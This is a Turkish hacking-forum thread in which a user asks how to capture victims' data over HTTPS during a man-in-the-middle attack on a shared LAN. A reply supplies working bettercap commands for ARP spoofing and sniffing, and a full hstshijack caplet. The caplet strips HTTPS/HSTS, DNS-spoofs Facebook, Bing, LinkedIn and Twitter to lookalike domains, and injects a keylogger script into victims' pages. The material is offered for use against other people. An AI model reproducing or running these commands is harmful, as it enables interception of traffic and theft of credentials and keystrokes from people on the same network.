Https & SSL sertifikası geçilebilir mi?

N

NightMare82

Yeni üye
7 May 2019
25
0
Başlıkta da belirttiğim gibi man in the middle attack yaparken, aynı LAN'a bağlı olanları Https olmasına rağmen kurbanların bilgilerini toplayabilir miyiz?
 
Tarihe göre sırala Oylara göre sırala
D

DarNode

Yeni üye
15 Haz 2020
17
0
evet yapabilirsiniz hstsh olan siteleri bile kırabilirsiniz ben bettercap kullanıyorum https yi http downgrade yapabiliyor fakat her zaman çalışmıyor bazen çalışıyor

bettercap -iface wlan0
eth0 veya wlan0 seçersin birini
net.probe on sonra net.show diyorsun karşına wifi'ına bağlı kişiler çıkıyor
set arp.spoof.dublex true
set arp.spoof.targets 192.168.1.1 (ip adresi örnek birden fazla seçmek için 192.168.1.1,192.168.1.2 virgül koy)
arp.spoof on
net.sniff on (bunu açtığın an bilgiler düşmeye başlar)

ek olarak hstsh siteleri kırmayı göstereceğim ama gerekli durumlar oluştuğu zaman çalışır.

hstshijack/hstshijack deyince çalışır fakat çalışmıyor ben sana çalışan kodu vereyim.

cd /usr/share/bettercap/caplets/hstshijack (burada hstshijack.cap dosyası olması lazım bulursun)

hepsini sil içine şu kodları yaz


Kod: 
set hstshijack.log             /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore          *
set hstshijack.targets         facebook.com, *.facebook.com, *.bing.com, bing.com, [url]www.linkedin.com[/url], twitter.com
set hstshijack.replacements    facebook.corn, *.facebook.corn,*.bing.corn, bing.corn, linkedin.com, twitter.corn
#set hstshijack.blockscripts    facebook.com,*.facebook.com
set hstshijack.obfuscate       false
set hstshijack.encode          false
set hstshijack.payloads        *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js, *:/root/atil.js

set http.proxy.script  /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains  facebook.corn, *.facebook.corn,*.bing.corn, bing.corn, linkedin.com, twitter.corn

http.proxy  on
dns.spoof   on

hstshijack/hstshijack
çalıştır.

+ :))​
 
Moderatör tarafında düzenlendi:
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.